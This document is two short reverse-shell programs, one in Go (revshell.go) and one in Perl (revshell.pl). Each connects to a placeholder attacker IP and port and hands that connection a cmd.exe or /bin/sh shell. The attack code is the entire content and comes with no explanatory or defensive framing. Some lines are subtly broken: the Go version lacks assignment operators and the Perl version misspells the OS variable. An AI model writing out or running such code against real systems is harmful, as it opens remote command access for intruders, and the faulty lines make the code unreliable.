File: revshell.go
package main

import (

"net"

"os/exec"

"runtime"

)

func main() {

conn, _ := net.Dial("tcp", "attacker_ip: attacker_port")

var cmd *exec.Cmd

if runtime.GOOS == "windows" {

cmd exec.Command("cmd.exe")

} else {

cmd exec.Command("/bin/sh")

}

cmd.Stdin = conn

cmd.Stdout = conn

cmd.Stderr = conn

cmd.Run()

}

File: revshell.pl
use Socket;

$ip="attacker_ip"; $port=attacker_port;

socket (S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));

if(connect(S, sockaddr_in($port, inet_aton($ip)))){open (STDIN, ">&S"); open (STDOUT, ">&S");

open (STDERR, ">&S"); exec(($^0 eq 'MSWin32') ? "cmd.exe": "/bin/sh -i");};